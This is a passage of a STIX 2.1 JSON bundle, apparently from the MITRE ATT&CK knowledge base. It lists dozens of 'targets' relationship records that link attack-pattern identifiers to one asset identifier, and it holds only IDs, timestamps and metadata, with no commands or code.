"x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--ba328318-8605-4682-bf02-d81f57e2c466", "created": "2024-07-01T10:37:15.840880", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.840882", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--4fe28b27-b13c-453e-a386-c2ef362a573b", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--dc2c44b9-a449-4d75-8c04-7a849e7df410", "created": "2024-07-01T10:37:15.840889", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.840891", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--51ea26b1-ff1e-4faa-b1a0-1114cd298c87", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--9eceff6c-55b6-450e-9361-abdbec60e9f8", "created": "2024-07-01T10:37:15.840899", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.840901", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--5372c5fe-f424-4def-bcd5-d3a8e770f07b", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--83c146eb-5f52-4f5a-96ab-3edcaa9100ee", "created": "2024-07-01T10:37:15.840908", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.840910", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--53ac20cd-aca3-406e-9aa0-9fc7fdc60a5a", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--d284345e-c00b-4474-88ad-9e162bb4ee5a", "created": "2024-07-01T10:37:15.840917", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.840919", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--54a649ff-439a-41a4-9856-8d144a2551ba", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--6cb9b454-4fd1-4d0b-9be5-978770dcae39", "created": "2024-07-01T10:37:15.840926", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.840928", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--54b4c251-1f0e-4eba-ba6b-dbc7a6f6f06b", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--5ce93ee6-3925-4a39-99c4-5a42c4f58ed0", "created": "2024-07-01T10:37:15.840935", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.840937", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--561ae9aa-c28a-4144-9eec-e7027a14c8c3", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--822c3dfd-047b-4098-a4b3-b3cbf0164e6d", "created": "2024-07-01T10:37:15.840945", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.840947", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--562e9b64-7239-493d-80f4-2bff900d9054", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--2127ae59-ee66-4ce4-aeef-43c129ceca8b", "created": "2024-07-01T10:37:15.840954", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.840956", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--58a3e6aa-4453-4cc8-a51f-4befe80b31a8", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--87628c8b-cb76-40f4-b8f9-fe4e100d6039", "created": "2024-07-01T10:37:15.840963", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.840965", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--5909f20f-3c39-4795-be06-ef1ea40d350b", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--eb3bd3e7-3191-4700-a2e3-76ea0856e51c", "created": "2024-07-01T10:37:15.840973", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.840974", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--59ff91cd-1430-4075-8563-e6f15f4f9ff5", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--0080fe10-323f-4938-b7a6-bef788d45e23", "created": "2024-07-01T10:37:15.840982", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.840984", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--5b0ad6f8-6a16-4966-a4ef-d09ea6e2a9f5", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--edc40456-6016-4bbd-a4b5-9306595bb406", "created": "2024-07-01T10:37:15.840991", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.840993", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--5bfccc3f-2326-4112-86cc-c1ece9d8a2b5", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--1b79140f-2cb7-40eb-8053-e2559f8286a5", "created": "2024-07-01T10:37:15.841000", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.841002", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--5d0d3609-d06d-49e1-b9c9-b544e0c618cb", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--69654113-9c80-45eb-a6e9-5b4d04e812dd", "created": "2024-07-01T10:37:15.841010", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.841011", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--5e4a2073-9643-44cb-a0b5-e7f4048446c7", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--dca04bc8-736b-4363-a672-97dd16e30b36", "created": "2024-07-01T10:37:15.841019", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.841021", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--60b508a1-6a5e-46b1-821a-9f7b78752abf", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--4ff136bb-d246-4e2b-9194-d36aa9e578ac", "created": "2024-07-01T10:37:15.841028", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.841030", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--613d08bc-e8f4-4791-80b0-c8b974340dfd", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--3dcbee73-2ebc-4811-850a-fcf01d98a181", "created": "2024-07-01T10:37:15.841037", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.841039", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--6151cbea-819b-455a-9fa6-99a1cc58797d", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--8546d132-febb-41f0-b264-15c1f2d23fac", "created": "2024-07-01T10:37:15.841046", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.841048", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--63220765-d418-44de-8fae-694b3912317d", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--7d092b7d-a2dc-4737-b798-b735330938b7", "created": "2024-07-01T10:37:15.841684", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.841687", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--633a100c-b2c9-41bf-9be5-905c1b16c825", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--086ea3de-bd3e-42bf-9210-ec253659aaae", "created": "2024-07-01T10:37:15.841697", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.841699", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--635cbe30-392d-4e27-978e-66774357c762", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--5fb3b043-a1ca-421a-833e-7c0a2c779b02", "created": "2024-07-01T10:37:15.841706", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.841708", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--64196062-5210-42c3-9a02-563a0d1797ef", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--50d370f4-edb8-4d4b-981f-4abaeca890b0", "created": "2024-07-01T10:37:15.841715", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.841717", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--65917ae0-b854-4139-83fe-bf2441cf0196", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--9a64a4cd-a603-4767-9b89-7ef4b9043766", "created": "2024-07-01T10:37:15.841724", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.841726", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--67720091-eee3-4d2d-ae16-8264567f6f5b", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--990b06d1-68e9-4cc4-98d3-ce7443c2c44a", "created": "2024-07-01T10:37:15.841733", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.841735", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--6831414d-bb70-42b7-8030-d4e06b2660c9", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--c4dac398-5e5a-4bc8-9597-e098b394d05b", "created": "2024-07-01T10:37:15.841742", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.841744", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--692074ae-bb62-4a5e-a735-02cb6bde458c", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--988ee77e-7107-4834-aa22-5666ed1decf3", "created": "2024-07-01T10:37:15.841751", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.841753", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--69b8fd78-40e8-4600-ae4d-662c9d7afdb3", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--5d32babf-c074-4a04-b2a0-2f6537fd4eee", "created": "2024-07-01T10:37:15.841760", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.841762", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--69e5226d-05dc-4f15-95d7-44f5ed78d06e", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--72e8ebf0-2520-4653-be76-b19807b839fa", "created": "2024-07-01T10:37:15.841769", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.841771", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--6add2ab5-2711-4e9d-87c8-7a0be8531530", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--f5ff2afc-cd0c-45e6-83fe-d93fa0303138", "created": "2024-07-01T10:37:15.841778", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.841779", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--6b57dc31-b814-4a03-8706-28bc20d739c4", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--f5db3049-ad0d-4250-8ef7-612b6a578ce5", "created": "2024-07-01T10:37:15.841787", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.841788", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--6faf650d-bf31-4eb4-802d-1000cf38efaf", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--00d95203-90d3-4e2e-8ac6-81689c7207d6", "created": "2024-07-01T10:37:15.841796", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.841798", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--707399d6-ab3e-4963-9315-d9d3818cd6a0", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--027b3660-9438-4db6-91f6-b6d1ae04a897", "created": "2024-07-01T10:37:15.841805", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.841806", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--72b74d71-8169-42aa-92e0-e7b04b9f5a08", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--d0d03f8f-1582-4c08-a62b-f245d02f3d13", "created": "2024-07-01T10:37:15.841813", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.841815", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--731f4f55-b6d0-41d1-a7a9-072a66389aea", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--26e62ea5-aa9e-40b1-b7b0-b30316df1c93", "created": "2024-07-01T10:37:15.841822", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.841824", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--7385dfaf-6886-4229-9ecd-6fd678040830", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--a6fac4e5-128f-428e-9b80-2b68f610a7c3", "created": "2024-07-01T10:37:15.841831", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.841833", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--74d2a63f-3c7b-4852-92da-02d8fbab16da", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--c17e0d1b-7b5b-49e6-a945-713d4af23426", "created": "2024-07-01T10:37:15.841840", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.841842", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--7610cada-1499-41a4-b3dd-46467b68d177", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--95a16286-44ed-428a-885d-60d07d899795", "created": "2024-07-01T10:37:15.841849", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.841850", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--774a3188-6ba9-4dc4-879d-d54ee48a5ce9", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--5f6bd668-a48d-4681-ab34-afdc8007b558", "created": "2024-07-01T10:37:15.841858", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.841859", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--77eae145-55db-4519-8ae5-77b0c7215d69", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--c7b1a7dc-6e60-4c53-9e3b-9f619a4e427f", "created": "2024-07-01T10:37:15.841867", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.841869", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--791481f8-e96a-41be-b089-a088763083d4", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--fbfc598e-2d84-40a7-8494-7999aa0137e4", "created": "2024-07-01T10:37:15.841876", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.841877", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--799ace7f-e227-4411-baa0-8868704f2a69", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": 